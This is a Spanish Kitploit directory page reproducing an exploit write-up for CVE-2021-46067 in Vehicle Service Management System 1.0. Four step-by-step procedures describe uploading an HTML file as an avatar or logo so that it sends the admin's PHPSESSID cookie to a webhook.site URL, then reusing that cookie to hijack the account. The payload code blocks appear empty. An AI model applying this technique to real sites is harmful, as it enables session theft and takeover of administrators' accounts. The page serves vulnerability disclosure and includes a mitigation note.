Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover — CVE-2021-46067 - En Vehicle Service Management System 1.0 un atacante puede robar las cookies, lo que lleva a una toma total de la cuenta. | Kitploit
Herramientas/GitHubGitHub/sanupl/vehicle-service-management-system-multiple-cookie-stealing-leads-to-full-account-takeover
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHubsanupl/vehicle-service-management-system-multiple-cookie-stealing-leads-to-full-account-takeover

Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-46067 - En Vehicle Service Management System 1.0 un atacante puede robar las cookies, lo que lleva a una toma total de la cuenta.

Ver Repositorio
hace 3 mesesAún no revisado

CVE-2021-46067

Título del Exploit: Sistema de Gestión de Servicio de Vehículos - 'Múltiple' Robo de Cookies Conduce a la Toma Completa de la Cuenta

Autor del Exploit: SANU P.L

CVE: CVE-2021-46067

CVSS: 9.8 CRÍTICO

Referencias:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-cookie-stealing-leads-to-full-account-takeover
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46067
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46067

Descripción:

En el Sistema de Gestión de Servicio de Vehículos 1.0, un atacante puede robar las cookies lo que lleva a una Toma Completa de la Cuenta.

1. Sistema de Gestión de Servicio de Vehículos - 'MiCuenta' (/admin/?page=user)

Explotación:

  1. Inicie sesión en el panel de administración http://localhost/vehicle_service/admin
  2. Navegue a la sección Mi Cuenta http://localhost/vehicle_service/admin/?page=user
  3. Genere la URL del Webhook - https://webhook.site
  4. Copie la URL única del Webhook y péguela en el siguiente código html.

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>

</body>
</html>
  1. Guarde el código html anterior, por ejemplo: Cookie Stealing.html
  2. En la sección Mi Cuenta, ingrese todos los detalles requeridos y seleccione el archivo html en Avatar.
  3. Haga clic en el botón de actualizar.
  4. Abra la imagen del avatar en una nueva pestaña y verifique el estado del Webhook.
  5. Obtuvimos la solicitud, contiene PHPSESSID.
  6. Copie el valor de PHPSESSID y abra cualquier otro navegador.
  7. Visite el panel de administración http://localhost/vehicle_service/admin
  8. Verifique los valores de las cookies y cambie el valor de PHPSESSID por el valor copiado.
  9. Ahora acceda al panel de administración http://localhost/vehicle_service/admin
  10. Inició sesión exitosamente en la cuenta. Toma de cuenta exitosa.

2. Sistema de Gestión de Servicio de Vehículos - 'Lista de Usuarios' (/admin/?page=user/manage_user)

Explotación:

  1. Inicie sesión en el panel de administración http://localhost/vehicle_service/admin
  2. Navegue a la sección Lista de Usuarios y haga clic en el botón Crear Nuevo.
  3. Genere la URL del Webhook - https://webhook.site
  4. Copie la URL única del Webhook y péguela en el siguiente código html.

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>

</body>
</html>
  1. Guarde el código html anterior, por ejemplo: Cookie Stealing.html
  2. En la sección Crear Nuevo Usuario, ingrese todos los detalles requeridos y seleccione el archivo html en Avatar.
  3. Haga clic en el botón Guardar.
  4. Abra la imagen del avatar en una nueva pestaña y verifique el estado del Webhook.
  5. Obtuvimos la solicitud, contiene PHPSESSID.
  6. Copie el valor de PHPSESSID y abra cualquier otro navegador.
  7. Visite el panel de administración http://localhost/vehicle_service/admin
  8. Verifique los valores de las cookies y cambie el valor de PHPSESSID por el valor copiado.
  9. Ahora acceda al panel de administración http://localhost/vehicle_service/admin
  10. Inició sesión exitosamente en la cuenta. Toma de cuenta exitosa.

3. Sistema de Gestión de Servicio de Vehículos - 'Configuración-Logo del Sistema' (/admin/?page=system_info)

Explotación:

  1. Inicie sesión en el panel de administración http://localhost/vehicle_service/admin
  2. Navegue a la sección Configuración http://localhost/vehicle_service/admin/?page=system_info
  3. Genere la URL del Webhook - https://webhook.site
  4. Copie la URL única del Webhook y péguela en el siguiente código html.

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>

</body>
</html>
  1. Guarde el código html anterior, por ejemplo: Cookie Stealing.html
  2. En la sección Configuración, ingrese todos los detalles requeridos y seleccione el archivo html en Logo del Sistema.
  3. Haga clic en el botón de actualizar.
  4. Abra la imagen del Logo del Sistema en una nueva pestaña y verifique el estado del Webhook.
  5. Obtuvimos la solicitud, contiene PHPSESSID.
  6. Copie el valor de PHPSESSID y abra cualquier otro navegador.
  7. Visite el panel de administración http://localhost/vehicle_service/admin
  8. Verifique los valores de las cookies y cambie el valor de PHPSESSID por el valor copiado.
  9. Ahora acceda al panel de administración http://localhost/vehicle_service/admin
  10. Inició sesión exitosamente en la cuenta. Toma de cuenta exitosa.

4. Sistema de Gestión de Servicio de Vehículos - 'Configuración-Portada del Sitio Web' (/admin/?page=system_info)

Explotación:

  1. Inicie sesión en el panel de administración http://localhost/vehicle_service/admin
  2. Navegue a la sección Configuración http://localhost/vehicle_service/admin/?page=system_info
  3. Genere la URL del Webhook - https://webhook.site
  4. Copie la URL única del Webhook y péguela en el siguiente código html.

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>

</body>
</html>
  1. Guarde el código html anterior, por ejemplo: Cookie Stealing.html
  2. En la sección Configuración, ingrese todos los detalles requeridos y seleccione el archivo html en Portada del Sitio Web.
  3. Haga clic en el botón de actualizar.
  4. Abra la imagen de la Portada del Sitio Web en una nueva pestaña y verifique el estado del Webhook.
  5. Obtuvimos la solicitud, contiene PHPSESSID.
  6. Copie el valor de PHPSESSID y abra cualquier otro navegador.
  7. Visite el panel de administración http://localhost/vehicle_service/admin
  8. Verifique los valores de las cookies y cambie el valor de PHPSESSID por el valor copiado.
  9. Ahora acceda al panel de administración http://localhost/vehicle_service/admin
  10. Inició sesión exitosamente en la cuenta. Toma de cuenta exitosa.

Impacto:

Un atacante sube un archivo html malicioso que redirige a un sitio web de terceros y las cookies quedan expuestas en la solicitud. Esto lleva a una Toma Completa de la Cuenta.

Mitigación:

Se recomienda validar la funcionalidad de carga de archivos y realizar comprobaciones secundarias en la sesión.

Descargar herramienta